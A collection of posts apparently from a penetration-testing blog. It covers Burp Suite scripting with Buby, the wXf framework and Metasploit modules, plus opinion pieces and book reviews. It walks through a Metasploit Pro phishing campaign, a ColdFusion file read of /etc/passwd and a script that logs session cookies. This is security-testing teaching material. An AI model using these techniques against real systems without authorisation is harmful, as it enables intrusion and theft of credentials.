As of now the keyword list in wXf isn't huge but I plan on adding to it over the next few days. If you'd like to utilize GitHub's fork/edit/merge function to contribute interesting parameter names please fork the following file.

If you have a personal keyword list that you'd like to use privately that is okay too. The video shows you how to add a file under the datum directory and reload the list of "lfiles" (files under the datum directory).

Don't forget that if you have questions on usage, installation or anything else we've provided documentation here .

Hopefully being back on blogger will allow for more and better discussions than on the drupal site and if the blind elephant guy is working on an update, hopefully this fucks up his talk and he doesn't get to call us out this year b/c Drupal sucks to update/manage.

For those of you who have been following the Buby Script Basics of this blog, I hope you'll apply that knowledge to creating a module in wXf. This is a great way for us to share our individual scripts in a way that allows them to be customized on the fly (because the console can set options like the rhost, rport, content to extract, etc.)

Anyway, hopefully this new feature of the framework can continue to grow and become a more powerful feature.

In this portion of the Buby Script Basics series (Part 6), we cover the sendToSpider and makeHttpRequest methods.As always, you can find sample scripts for all of the code in this series under the examples directory of the buby-script repo located Here.The script make_http_request.rb (under examples directory) will be used to demonstrate makeHttpRequest and sendToSpider.$burp.get method=============Line 24 - We defined the method ($burp.get) which takes a url valueLines 25-27 - If the url is NOT in scope, we send this to the spider functionLine 28 - We used regexp to extract the path of the url Line 29 - We instantiate an object called 'path' which is the same as path_matchLine 30 - An object called prefix is instantiated, this is where we extract http:// or https://Line 31 - uri is basically the url minus the prefix (http:// or https://)Line 32 - Prior to removing a port (such as url:9000), we extrapolate either an IP or hostnameLine 33 - Same deal for port, prior to removing the colon, we create a presub_port object which is the colon + port number.Line 34 - The port object is created, this is presub_port cast to String type and the colon removedLine 35 - pre object equals true or false depending on whether or not the prefix is http or https.Line 36 - rpath (remote path) is the path object. If no path was specified it defaults to '/'.Line 37 - host is cast to a String type and the presub_port and rpath values are stripped (gives us the true host value).Line 38 - req_str object is the value of get_req (the method we discuss below).Line 39 - res object is instantiated and it is the value of the response when makeHttpRequest call is made. 'res' will be a String type.Line 40 - We print 'res' to the console

get_req method============

Line 10 - The method get_req is defined, takes three parameters. Host, Port and Path values.

Line 11 - 'str' object is created and cast as a String type.

The important lines here are 12, 13 and 20.

Line 12 - We take the path value and insert it into the first line of the request string.

Line 13 - host and port are concatenated so that www.example.com and 80 become one string value (www.example.com:80)

Line 20 - Notice how we append two newline characters ("\n\n") versus only one newline character like the rest of the string lines. This is important because Burp will error out and fail to send the request if this is missing. This is how Burp differentiates the Headers & Body and even if the body is missing Burp still needs the marker (two newlines) to mark the end of the headers section and understand the request.That is it, go ahead and try the script out and when you run it make sure you choose the -i or interactive option. Example:

$ jruby -S buby -i -B burp_pro.jar -r make_http_req.rb At the console, to run the this method, you can type the following (examples): $burp.get('http://www.example.com') $burp.get('http://www.example.com:9050') $burp.get('http://www.test.com:3333/test/test.aspx?error=error.jpg')

In this portion of the Buby Script Basics series (Part 5), we will cover all but two of the remaining methods (methods without lines through them) on our checklist.

As always, you can find sample scripts for each of these under the examples directory of the buby-script repo located Here.

The three methods we will cover are issueAlert, sendToIntruder, and sendToRepeater. The example script is called sendto_and_issue_alert.rb and encompasses all three.

The purpose of this script is to check the body of post messages to see if one of the parameters matches our list of interesting parameters (FUZZ_PARAMS) which deserve manual analysis. We'll perform the manual analysis with intruder/repeater and then issue an alert when the request has been sent over.

Unlike the previous tutorials, this script will be ran by invoking the method via the command line.

Example of how to run this script (covered in Part 1 of this series:

$ jruby -S buby -i -B burp_pro.jar -r sendto_and_issue_alert.rb

This script is going to be run against the proxy history, it's going to search the proxy history looking for the interesting requests. After you've interacted with the site type "$burp.run".

If the parameters in the body of the POST message match our interesting params, you should see the following:

Request sent to repeater, notice the name of the tab (it is our fuzz param "Price")

The request has been sent to intruder

Lastly, an alert will appear notifying you that the previously mentioned actions have been taken.

Time to discuss the code that does all this :-)First we establish parameters that could be interesting to us in terms of performing manual analysis.This method '$burp.run' is the catalyst for everything that comes next. When the user types $burp.run at the console they are invoking this method. Line 2 instantiates the proxy_hist object ($burp.get_proxy_history). The fourth line determines if the length is greater than 0. If so, start iterating thru each obj in the get_proxy_history array. Line 7 invokes the hmeth method (passes it the 'obj' object). Line 8 calls extract_str with the result of Line 7 (hmeth...which is the HTTP Method) and the 'obj' object.

The req_meth takes the request_headers, takes the first line and converts it to a string. The '[0..3]' method extracts the first 4 characters of the first line of the request headers. The method returns this value.

Part 1 of extract_strThe extract_str method is where the FUZZ_PARAMS are searched against the request message and sent to repeater/intruder (along with the alert). The second line splits objs into the http_meth and req objects. The third line ensures that we do not execute any further code unless the http_meth is a POST method. Then we instantiate the bparams object as a Hash on line 4.On line 5, the request_body gets split by the ampersand (so that we break up all the params and their values into key/value pairs (ex: Price=2099.00).Next, we split these pairs up by the '=' (equal sign) and place each param/value (key/value) into the bparam hash. Conceptually the bparam hash would look likebparam = {'Price' => '2099.00}The last line assigns either true or false to the proto object based on whether or not the protocol is https.Part 2 of extract_strHere we begin iterating thru each item in the FUZZ_PARAM array. If the bparam hash has as key which matches on of the items in FUZZ_PARAM, we send it to intruder/repeater and issue our alerts.Explanation of methods:

The code here is nothing more than two arrays. The first array, EXCLUSION_LIST, contains items we'd like to exclude from scope. The second array, INCLUSION_LIST, contains items to include.

This following portion of code contains a PREFIX array (both http and https). We perform an iteration of both and while iterating through this prefix array, we start iterating through a second list (EXCLUSION_LIST) and concatenating the prefix + host + the item in the EXCLUSION_LIST. This step is repeated for the INCLUSION_LIST. The $burp.includeInScope() method is called and we submit the concatenated value (url) to it.

do_active_scan, do_passive_scan, isInScope

----------------------------------------------------

The def $burp.evt_proxy_message is a familiar one at this point in the series so we won't discuss this in detail. The code @@msg = nil exists solely to instantiate a global object called msg. We will need to keep an object associated with the request message (headers/body) because passive scanning requires both a request message and response message.

pre = is_https? 'https' : 'http' is just a way to define the "pre" object based on whether or not it is http or https message.

pre_bool does the same thing as the pre object but instead of http/https it is a true/false.

uri = "#{pre}://#{rhost}:#{rport}#{url}" is just the url (string concatenation).

The last three lines of code here basically set the @@msg value. We only want to do this if it is a request. Remember, we need an object to hold the request message so that even if the current message is a response we can call both the request message and response message.

Next bit of code basically says, if this message is in scope AND is a request message, start performing an active scan. Otherwise if it is a message which is in scope but a response message then perform passive scanning.

So let's cover each individually with brief explanation and a code example.You can find sample scripts for each of these under the examples directory of the buby-script repo located Here.

EVT_HTTP_MESSAGE---------------------------------

The following code will allow you to obtain methods exposed by the message_info object (which is a class):

The 3 separate objects that make up the param are:

tool_name => This is a string value, it is the name of the tool for which the message originated. Examples include proxy, scanner and repeater.

is_request => Boolean value (true/false), this returns true when it is a request and false when a response.

message_info => This is a class. It is an instance of the IHttpRequestResponse Java class. So there are methods such as get_comment, set_comment and getUrl exposed.

An example of using evt_http_message can be seen here (code):

....and the resultw00t!So what does the code actually do?Lines 1 and 2 - Define the method and separate param into 3 separate objects.Lines 3-5Ln 3 If the tool the message originated from was the spider and this is NOT a request proceed to Ln 4.Ln4 If the response status code is 200 (OK), then move to Ln 5.Ln 5 Puts "Yo, we received a 200 FTW!" to the console.Lines 6-9 Are closing statements/method and passing the param back up to the superclass method.

You can find another example using this method in the zlib_inflate.rb script.

EVT_SCAN_ISSUE---------------------------

The following code will allow you obtain methods exposed by the issue object (which is a class):

Only one object is exposed, it is a class, it is called issue. Some of the methods exposed by this class are

Lines 1-2 - Defines the method (prnt) and separates objs into two objects (strn, meth).Lines 3-4 - This defines a string instance variable (str), and then proceeds to put the strn object onto it. Lines 6-10 - We take the meth object which is an Array, we iterate thru each item in the array, convert it to a string while calling the four methods it exposes (request_headers, request_body, response.headers, and response_body). Now these methods all belong to http_messages and itm really represents the http_messages class. So when we are iterating thru this array we are really iterating thru an array containing a bunch of http_messages classes. Hopefully that makes sense.

Line 1 - Defines the method ($burp.evt_scan_issue) and instantiates the "issue" object.

Lines 2-14 - Creates an Array called "meth_array" which consists of methods associated with the issue object instantiated on line 1.

Lines 16-18 - Iterates thru the meth_arry we created on line 2 picking out each method and then sends the method name and the method itself to prnt.

Line 20 - The http_message method attached to the issue object isn't in the meth_arry because it can't be called directly and converted to a string. This is because http_message is a an array of classes. Each class has it's own methods. So, we made a special prnt method for it called hm_prnt.

Well that is all for Part 3 of this series. Part 4 will cover some of the other methods listed in the first part of this post. If you have any feedback please provide it so that the series can be improved upon.Happy Hacking,

I got involved with HDM, skape, spoonm, et all and the metasploit project quite a long time ago, probably around msf 1ish time frame. It was an exciting time and metasploit was one of the best open source infosec (if not the best) projects out there. We gave talks, released tools, and HDM and I gave the Tactical Exploitation training course for several years. Core impact and Canvas were lurking around and constantly growing in capability as well.

Lets cover one of the most used methods (in my opinion/experience) exposed by buby called "evt_proxy_message". I'd like to cover some of the objects exposed by this method and to best accomplish this task we will step through the cookie_snatch.rb script located Here.

On the second line you see that we convert *param to 12 separate objects. Here is a brief explanation of each:msg_ref===== This is the request/response number. It is nothing more than a tracking number.is_req====This is a boolean value, returns either true or false. If it is a request, this returns true, else, false.rhost===This is your target's hostname ONLY. It does NOT include the prefix (http/s), rport (80/443), or path (/directory/something.php).rport===This is the remote port value (80/443/etc)is_https======Returns true when https and false when http.http_meth=======This is the method (GET/POST/etc)url==This is the path portion of a URL. Not the full URL itself.Example: If the target was http://www.target.com/mydir/test.aspx then url would be /mydir/test.aspxresourceType==========The filetype of the requested resource, or nil if the resource has no filetypestatus====The HTTP status code returned by the server. This value is nil for request messages.req_content_type============String value, content-type header returned by the server. (nil for requests)message======String value, the entire message, regardless of request/response, contains headers and body.action====There are 4 types of actions ACTION_FOLLOW_RULES (0, this is the default)ACTION_DO_INTERCEPT (1, direction to intercept a msg)ACTION_DONT_INTERCEPT (2, don't intercept the msg)ACTION_DROP (3, drops the in/outbound msg)Example of using action (folks seem to have some confusion at times regarding this):if rhost == "www.example.com action[0] = 2endThe above code logic is, if the rhost value is www.example.com then don't intercept. The full code can be found in dont_intercept.rb in the Buby-Scripts repo.Back to the code:Lines 3-5Ln 3 is assigning cookiez.txt to 'file'.Ln 4 is evaluating the boolean value behind is_https?. If it is true then prefix = https:// and if false, http://.Ln 5 is creating a rurl object which consists of a string concatenation of prefix, rhost and rport.Lines 6-9Ln 6 is evaluating if is_req equals false (meaning it is a response). So unless it is a response, the code following it won't be run.Ln 7 spmsg (split message) is the message string split by two newlines. This separates the headers from the body. Array item 0 of spmsg (spmsg[0]) is going to be the headers and spmsg[1] will be the body.Ln 8 short_msg is assigned to spgmsg[0], converted to a string.Ln 9 assigns mitem to a the Set-Cookie portion of the response header.Lines 10-12Ln 10 uses the method in_scope?, which takes the full URL. This is the reason for creating the rurl object on line 5. If the response is from a site that is in scope, we evaluate the next 2 lines of code.Ln 11 basically if mitem (the Set-Cookie key, value) isn't nil, then we evaluate line 12.Ln 12 Open the file (file is created on line 3 and it is cookiez.txt), and write to it. Because we have assigned "a" instead of "w", the cookies will be appended versus overwritten.The rest of the code terminates "if" statements and sends the params up to the super class's version of evt_proxy_msg. This super(*params) can be nice when you'd like to modify data prior to it's arrival to Burp. Okay, well hopefully this was a good start for those interested in extending Burp's capabilities. Part 3 in this series will cover other useful methods exposed by Buby. ~Happy Hackingcktricky

For those of you who are new to Buby, it is a platform to write Ruby based extensions for the Burp Suite API and I'm going to attempt to cover some of the basics. First let me say thank you to Tebo for providing his insight. Tebo is the author of the Buby.kicks_ass => true article. Additionally, thank you Eric Monti the creator of Buby. Buby's homepage is located Here .

Installing:

Although you can write Ruby code, this is a JRuby Gem. What does this mean? It means that the code execution environment is JRuby (Java+Ruby) and the Gem should be installed in the JRuby environment.

Lets install JRuby first:

Next, install the Buby Gem.

Basic example of running a script:

The options you see explained

jruby -S buby => runs the jruby environment leveraging the buby gem

-i => interactive, this means you can interact with Burp from the console.

-B => this is the location of your Burp jar file

-r => The script you'd like to run. This is an easy way to run the buby code you've created.

Finally, an example of sending a command to burp via the -i (interactive option). Here we produce an alert "Hello World".

Pre-command

Command

Post Command

Okay so that wraps up Part 1 of Buby Basics.

If you'd like some scripts to mess around before Part 2, you can find some scripts I put together Here.

#loop through each module in the listmodules.each do |blah| self.run_single("use #{blah}") puts ("\nRunning Auxiliary Module #{blah}") #for each host with 443 open, set appropriate configs and run the module against it hosts.each do |rhost| self.run_single("set RHOSTS #{rhost}") self.run_single("set RPORT 443") #change to the port above self.run_single("set SSL TRUE") self.run_single("run") end end[/ruby] **#replace [ and ] with their respective ""**

-a Search for a list of addresses -c Only show the given columns -h,--help Show this help information -n Search for a list of service names -p Search for a list of ports -r Only show [tcp|udp] services -u,--up Only show services which are up -o Send output to a file in csv format -R,--rhosts Set RHOSTS from the results of the search

So I’m listening to the “Larry, Larry, Larry” episode of the Risk Hose podcast, and Alex is talking about data-driven pen tests. I want to posit that pen tests are already empirical. Pen testers know what techniques work for them, and start with those techniques.

What we could use are data-driven pen test reports. “We tried X, which works in 78% of attempts, and it failed.”

We could also use more shared data about what tests tend to work.

Thoughts?

Dre's response to the post was surprising to me, he listed a bunch of tools that seem to do correlating of pentest results into a portal so you can trend over time. Cool idea, i'll give the people that. But to me when we start jumping into repeatable metrics driven stuff we are in Vulnerability Assessment land, not pentesting land.Here is the comment I left:

I like the idea and i think it could be useful.

However, they need to drop the pentest part. you are solidly into the vulnerability assessment part of things when you are talking about “ok, i tried 1,2,3,4,5 and 1 & 3 worked” ok on to the next set of tests… thats vulnerability assessment (with exploitation if you want to get technical) and not pentesting.

pentesting is about that human looking at the problem and figuring out how to break it, not some scanner, thats going to be very hard to standardize and put hard numbers on and i dont think its going to be possible without tying up your tester’s time with bullshit.

I'm all for "repeatable" pentests. You should have a methodology for each type of test, but when you are paying for human's time you should be paying for them to go after the site like a human would and not how a scanner would or not in a way where i'm worried about religiously following some checklist because if i don't the metrics get all fucked up. Your pentest should come after you have thrown the kitchen sink at it scanner wise. as an added bonus this post was right below the new school post in my Google reader:http://coding-insecurity.blogspot.com/2011/04/developing-good-methodology-part-3.html

This post and really any methodology document you will ever read or write will have gaps, because no document on this subject can ever really be 100% all inclusive of every vulnerability and the myriad of variations that exist for many of these.

my new favorite modules (for today) are the snmp_enumusers and snmp_enumshares modules that work against windows hosts that have snmp running.

msf > use auxiliary/scanner/snmp/
use auxiliary/scanner/snmp/aix_version
use auxiliary/scanner/snmp/snmp_enumshares
use auxiliary/scanner/snmp/cisco_config_tftp
use auxiliary/scanner/snmp/snmp_enumusers
use auxiliary/scanner/snmp/cisco_upload_file
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_set

msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enumusersmsf auxiliary(snmp_enumusers) > info...SNIP...Description: This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP

I and another research fellow, AlanH0, who have carried out basic Web vulnerability digging over 80 companies including government, banks and listed companies in Hong Kong. We would like to see whether they have done their webapp security "homework" well since 2004 (i.e. OWASP Top 10 vulnerabilities are published). Amazingly, we have found over 120 basic vulnerabilities out of 90 organizations.

Did they still stay in a stone age that simply trust the scanner with "no risk", feeling secure and safe afterwards?
Did they get right party for penetration test?
Did they still believe in only CISSP could be the penetration tester?
Did they engage any secure software and system development lifecycle?
Did their developers get training regularly?

Penetration testing often focuses on individual vulnerabilities and services, but the quickest ways to exploit are often hands on and brute force. This two-day course introduces a tactical approach that does not rely on exploiting known vulnerabilities. Using a combination of new tools and lesser-known techniques, attendees will learn how hackers compromise systems without depending on standard exploits. The class alternates between lectures and hands-on testing, providing attendees with an opportunity to try the techniques discussed. A virtual target network will be provided, along with all of the software needed to participate in the labs.

Today we've released the beta version (rough, rough version) of wXf by making the repository public. Over the last year we've worked on this code in an "on again - off again" fashion. Since we've started the project we've learned a lot. I know I've personally learned a ton about Ruby and Metaprogramming (check out Paola Perrotta's book if you get a chance). We've rewritten the code several times but we've reached the point where it is at least stable enough to release. Now others have the chance to improve on it.

We've gotten loads of feedback from the beta group (consisting of a few volunteers) which has helped us tremendously with some of the usability and documentation. Additionally, we've started to gauge what people do and do not want to see. We know that the AppSec community doesn't want another point and click tool and certainly doesn't need another scanner.

The biggest question posed to us over the last 11 months was "Why not merge with (insert framework here)". The answer is actually incredibly simple and is the basis for why we created the software. We'd like the community of testers/consultants/developers/etc to decide what they want to see most.

To have the ability to adapt an entire framework to the user base and change it as needed is only feasible if we a) have total flexibility in modifying ANY portion of the code and b) aren't pigeonholed into just one area of focus (exploitation, scanning).

Whether it be source code review, exploitation, enumeration, fuzzing modules, phishing, mobile appsec or whatever else.......... we'd like to glue together some of the ideas and scripts of the community at large. So please contribute. Submit bugs, provide feedback, help with the wiki or develop modules. Every little bit counts.

As an update, wXf is almost ready to move forward with it's first release. Hopefully the software is what folks expected as we are still learning from and adapting to the beta group's feedback.

In the meantime, if you couldn't attend AppSec DC 2010, here is the video of the presentation Chris Gates, Seth Law and I put together. Unfortunately Seth Law could not make it due to a prior engagement but nevertheless contributed to the content.

Make sure to check out all of the great presentations that AppSec DC had under the asdc10 group on vimeo. Doug Wilson and Mark Bristow did a fantastic job organizing this conference and my hat goes off to them.

The problem with pentesters phishing ... is that it does more harm then good for the organization. Without the education piece following a phish, you setup the organization to ban the practice."

Phishing and client-side attacks have been going on for far too long to not allow your testers to use them during test.**

So on one hand you are correct, every phishing exercise done either by an internal team, pentester, or attacker should be followed by an education piece by your internal security/IT team. Every phishing attack is an opportunity to retrain users.

On the other other hand, its how people get in. To broadly call it useless because 1. you are too lazy to educate your users after the fact or 2. didn't think ahead enough to require the PT shop to leave you with education materials or follow up the phish with an education piece doesn't mean it lacks value.

Like I mentioned in the previous post, you need to know how you are going to stand up in realistic scenarios. Does one client-side 0day leave your whole network open to all sorts of badness? you need to know.

**This is assuming that the company's maturity level supports doing a phishing exercise. If your internal security just plain sucks, then you could probably win the argument that no phishing should be conducted but I would counter with why are you getting a Pentest in the first place if things are that bad. Use those consulting dollars to have the consultant help you with your risk plan, internal vulnerability scanning/patching program, workstation/server hardening or teaching you how to scan your internal assets yourself. To steal a Nickerson analogy..."how do you know you can put up a fight if you cant take punch" BUT that doesnt mean you start out getting your ass kicked by starting training with [INSERT MMA BADASS HERE] instead of working your way up.

Everyone should check out the slides and the whitepaper although the slides are better with the case studies and the diagrams. When you check out the slides I encourage you to think about your last pentest and:

Everyone should check out the slides and the whitepaper although the slides are better with the case studies and the diagrams. When you check out the slides I encourage you to think about your last pentest and:1. could your pentest shop emulate an attacker of the level in the case studies. 2. did you or they try to scope the test in order to test things like this...aka do a Full Scope test.3. if you aren't letting your pentesters go after your network like this how do you think YOUR network will hold up against someone that knows what they are doing?

If you ARE a pentester when was the last time you got the time and scope to do something on the order of these attacks and post exploitation activities from the case studies?

We are getting great at catching our penetration testers (video) but still horrible at catching bad guys. Rather than draining your corporate bank account to have some shop come in and help you clean up your mess and you've discovered someone stealing everything you own... 1. pick a Full Scope shop that can emulate advanced attackers and not just script kiddies with a checkbook and 2. train like you fight, open the scope for your test, give your testers time to conduct a REAL test, and let your pentesters go after it like a real bad guy would.

Instead of making your testers "test' that same 500 hosts out of 10,000 hosts with no client-sides or user interaction allowed...ask, make, force, them to conduct an end-to-end test of the expensive black boxes you have sitting in the rack, your user education, your network segmentation, and your NOC/SOC's ability to test and respond to attacks. Better to find out you suck during your test instead of when someone is stealing everything that makes you money.

Yesterday I made a tweet stating that pen testing and pen testers are obsolete. Here's what I mean by that.

Originally, pen testing was a simulation of what real attackers would do. Then it became more about validating vuln scan/assessment results. Now its essentially about compliance check boxing. (PCI)

Vulnerability assessment pretty much no longer requires a skilled tester. There are now (and have been for a while) appliances and products which can schedule and automate vulnerability scans. At this point it is essentially a component of patch management. As vuln scanning has gone, so will pen testing go.

So new job gets me new fun toys. Figured i'd try the fancy shmancy tools and do a phish campaign with metasploit pro.

1. Go click on campaigns and star filling stuff out like what you want to call it

2. Set up your web campaign. With the web campaign you can actually host a webpage along with your exploit instead of just getting the typical "please wait" stuff.

3. Fill out your name of the template and the html of what you want it to say

4. By default it will run browser autopwn

5. Lets just pick an exploit to throw at them instead of all of them

6. Once you click save, it should look something like this:

7. After that you can set up the email portion of the phish

8. Fill out the sending server options

9. Then fill out the text for the body of your email

10. After you click save, you'll go to the add email addresses section where you can import a list, or type them in

11. Kinda looks like this when its all filled out. To start click the start campaign button

12. You can see the status of your sent emails and as people click them the percentage will change

13. I guess what the email could look like if you werent trying too hard :-)

14. And the web page serving up the exploit

15. You can now see that a user clicked the link and our percentage has changed

I'll cover hosts and sessions later. Only gripe is the lack of configuration ability in the exploit payload section. I've been told this will be addressed shortly even though a lot of work has been put into smart defaults the ability to change it when necessary would be nice.

Anyway, its a cool bug.1 -->because it affects several products although most people have probably never heard of most of them except for ColdFusion.2 -->its enabled by default on all those products you've never heard of except for ColdFusion, with the exception of CF 8 which appears to have it turned on by default.3 -->You have to apply patches for CF individually and there is no automated process. Since this vuln got little media attention I've seen alot of hosts that are still missing this patch and/or didn't turn off the vuln service.

On with the demo!

So against a patched host or someone that has disabled the service in ColdFusion you'll see one of two things; either 404's for the checks or 200 for /flex2gateway/ and 500 for the http or https check.

If you get a bunch of 400's then you need to set the VHOSTWhen it works, you'll see something like this for /etc/passwd

and like this when you asked for a file that doesn't exist or doesn't have permission to read (since CF doesn't run as root on linux, requesting /etc/shadow wont work) :-(

At this point, you're probably like "so what" well whats cool about arbitrary file read is that 1. it also works on Windows:

In part I agree, you are never going to "win" by keeping an attacker out. Like he puts in the post:

Traditionally we've held the mindset that we "win" if we stop the attackers. This mindset is sheer folly. To "win" in this scenario we need to successfully defend against 100% of attacks, whereas the attacker need only succeed once (probabilistically this works out to being far less than 100%).

Instead, we need to acknowledge the nature of our asymmetric threat and realize that there is no way to achieve "perfect" security and resist 100% of attacks. To think otherwise is willfully ignorant. Instead, we must accept a new status quo based on survivability. That is, despite successful attacks, we can consider ourselves victorious in conflict merely by surviving.

Protecting YOUR important data on the network is ultimately the goal of most network security. Keeping the attackers out is a silly goal. You are one adobe/flash/java/whatever 0day away from failing to keep attackers out and thus "losing".

Surviving a network attack is not the same as surviving a mortar attack on a FOB where if I'm still breathing and have use of my limbs at the end of it i can call that a "win". In turn, its not a successful penetration test or attack if merely "get in" and pop a bunch of shells (see Chris Nickerson's Top 5 Ways To Destroy A Company talk). Its a "win" when I steal what makes that company money, extract it without them knowing, then show it to them later for the "poop in the pants" moment. A report with a bunch of screenies of shells doesn't convey the same sense of "oh shit" that the first 100 entries of their key database does. In this case while the business may have thought they "survived" they in fact "lost".

We're getting really good at teaching our clients how to catch penetration testers and their methodologies and conditioning them that this a "win" when in fact most times defenders fail to see and catch people with a modified methodology, non public tools, or "non-standard" goals.

First Impressions...skinny book. Strike One. Chapter 1 -- "Intelligence Gathering: Peering Through the Windows to Your Organization" spends a lot of time on physical security and social engineering and no mention of Maltego. I'm not sure how anyone can write a book on Intelligence Gathering and NOT include Maltego. Strike Two.

First Impressions...skinny book. Strike One. Chapter 1 -- "Intelligence Gathering: Peering Through the Windows to Your Organization" spends a lot of time on physical security and social engineering and no mention of Maltego. I'm not sure how anyone can write a book on Intelligence Gathering and NOT include Maltego. Strike Two.

At this point i was thinking I had a dud on my hands BUT Chapter 2 --- "Inside-Out Attacks: The Attacker Is the Insider" redeems. Tons of code and examples to make XSS work in "realistic" scenarios mix the right amount of tech and narrative. My only gripe was that they talked about using XSS shell for XSS exploitation instead of using BEeF which is actively maintained and developed.

All the other chapters (except for Chapter 3) were very good, none of the others are as technical as chapter 2 but I believe they cover the current trends in a entertaining and readable way. Like one reviewer mentioned the information covered in Chapter 5 -- "Cloud Insecurity: Sharing the Cloud with Your Enemy" was not what I expected. It covered high level "possible" attacks versus any "probable" attacks. With the exception of possibly making insecure VM's and getting people to run it. Chapter 7 -- "Infiltrating the Phishing Underground: Learning from Online Criminals?" was a "chapterfied" version of the authors talk on the subject. Chapter 4 -- "Blended Threats: When Applications Exploit Each Other" was a good overview of stringing vulnerabilities that would be/were not considered high risk into high risk issues by combining one or more together which actually is "next generation".

Grabbing the index pages of web servers seems like a no brainer and something every pentester is going to perform on a test. The problem I ran into is how do you get this info once your inside and using meterpreter as your pivot into the network.

Your current options are to port forward to each host or set up a route via your meterpreter session and run some sort of auxiliary module. You can tcp port scan and find open ports or use the http_version module to see server version but you don't get a feel for whats actually on the site.

I opted to write something that would scan a range, perform a HTTP GET of / on the ip, then take the resulting body from the response, which should be html, and save it to a file to look at afterwards.

Grabbing the index pages of web servers seems like a no brainer and something every pentester is going to perform on a test. The problem I ran into is how do you get this info once your inside and using meterpreter as your pivot into the network.

Your current options are to port forward to each host or set up a route via your meterpreter session and run some sort of auxiliary module. You can tcp port scan and find open ports or use the http_version module to see server version but you don't get a feel for whats actually on the site.

I opted to write something that would scan a range, perform a HTTP GET of / on the ip, then take the resulting body from the response, which should be html, and save it to a file to look at afterwards.

Looks like this when it runs...

msf auxiliary(http_index_grabber) > set RHOSTS carnal0wnage.com/24 RHOSTS => carnal0wnage.com/24 msf auxiliary(http_index_grabber) > run [+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.4_20100904.4426.html [+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.5_20100904.4429.html [*] Received 301 to http://drumsti.cc/ for 209.20.85.10:80/ [-] Received 403 for 209.20.85.8:80/[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.12_20100904.4432.html... [*] Received 302 to http://209.20.85.57/apache2-default/ for 209.20.85.57:80/ [+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.56_20100904.4503.html[*] Received 302 to http://209.20.85.51/session/new for 209.20.85.51:80/

A poster on one of the other android posts mentioned you can just telnet into the android app if you've got the emulator running.Its easy to do and the preferred way if you just want to script events. Just telnet into localhost 5554 and you can issue emulator commands.user@dev:~$ telnet localhost 5554Trying ::1...Trying 127.0.0.1...Connected to localhost.Escape character is '^]'.Android Console: type 'help' for a list of commandsOKhelpAndroid console command help: help|h|? print a list of commands event simulate hardware events geo Geo-location commands gsm GSM related commands kill kill the emulator instance network manage network settings power power related commands quit|exit quit control session redir manage port redirections sms SMS related commands avd manager virtual device state window manage emulator windowhelp eventallows you to send fake hardware events to the kernelavailable sub-commands: event send send a series of events to the kernel event types list all type aliases event codes list all code aliases for a given type event text simulate keystrokes from a given textOKhelp geoallows you to change Geo-related settings, or to send GPS NMEA sentencesavailable sub-commands: geo nmea send an GPS NMEA sentence geo fix send a simple GPS fixyou get the idea...

Fatal System Error: The Hunt for the New Crime Lords Who are Bringing Down the Internet

Pseudo Book Review since its not "really" a tech book. The book is written with very little technical jargon and its an interesting read with a mix of information on Barrett Lyon who fought DDOS attacks against various websites, the ties of online gambling and the mob with a transition into the fight by Andy Crocker, a British cybersecurity agent, against the Russian and eastern block carding cybercriminials. An entertaining read about the history of carding and denial of service attacks by eastern block criminals.